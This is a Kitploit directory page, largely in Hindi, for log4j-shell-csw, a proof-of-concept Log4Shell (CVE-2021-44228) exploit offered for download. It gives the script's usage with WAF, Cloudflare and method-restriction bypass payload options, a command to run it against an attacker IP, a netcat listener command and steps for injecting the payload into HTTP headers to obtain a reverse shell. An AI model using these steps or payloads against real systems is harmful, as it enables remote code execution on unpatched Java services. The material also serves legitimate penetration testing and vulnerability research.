Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-shell-csw — CVE-2021-44228 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। | Kitploit
उपकरण/GitHubGitHub/cybersecurityworks553/log4j-shell-csw
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासकमांड एंड कंट्रोल
GitHubcybersecurityworks553/log4j-shell-csw

log4j-shell-csw

CVE-2021-44228 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
824 साल पहलेअभी तक समीक्षित नहीं

Log4j सरल शोषण

CVE-2021-44228 भेद्यता के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण।

Log4j, जो सुरक्षा और प्रदर्शन जानकारी लॉग करने के लिए उपयोग किया जाता है, विभिन्न उपभोक्ता और उद्यम सेवाओं, वेबसाइटों और अनुप्रयोगों के साथ-साथ चिकित्सा उपकरणों और सहायक प्रणालियों में Java का उपयोग करने वाले 3 बिलियन से अधिक उपकरणों को प्रभावित करता है।
नोट: यह एक 'पॉइंट एंड क्लिक' शोषण नहीं है। प्रारंभिक ट्रिगर पेलोड उत्पन्न किया जाएगा, लेकिन इसे उपयुक्त स्थान (जैसे HTTP हेडर/चैट/आदि) में इंजेक्ट करना उपयोगकर्ता पर निर्भर करेगा।

आवश्यक शर्तें

  • python3
  • pip install -r requirements.txt
  • jdk1.8.0_20 स्थापित करें और bin फ़ोल्डर को पर्यावरण चर में जोड़ें
root@kitploit:~
usage: python CVE-2021-44228-exploit.py --help 
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html

usage: CVE-2021-44228-exploit.py [-h] [--userip userip] [--webport webport] [--lport lport] [-b bypass]

log4shell Reverse shell exploit

optional arguments:
  -h, --help            show this help message and exit
  --userip userip       Enter IP for LDAPRefServer & Shell
  --webport webport     listener port for HTTP port
  --lport lport         Netcat Port
  -b bypass, --bypass bypass
                        Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the
                        ${lower:x} method restriction bypass
उदाहरण:
  1. विधि के बाइपास पेलोड के साथ Linux OS के लिए स्क्रिप्ट चलाएँ
root@kitploit:~
python poc-csw.py --userip private-ip --webport 8888 --lport 9001 -b methods

2) अपनी स्थानीय मशीन पर पोर्ट 9001 पर netcat चलाएँ

root@kitploit:~
nc -lvnp 9001
  1. विधियों की सीमा को बाइपास करने के लिए 'Try me' पेलोड कॉपी करें और netcat में शेल प्राप्त करने के लिए इसका इनपुट वेरिएबल उपयोग करें
    नोट: यदि कोई बाइपास नहीं चुना गया है तो 'Send me' पेलोड का उपयोग करें

संदर्भ

  • https://akashpatil.me/log4j-guide-book.html
  • https://github.com/kozmer/log4j-shell-poc
टूल डाउनलोड करें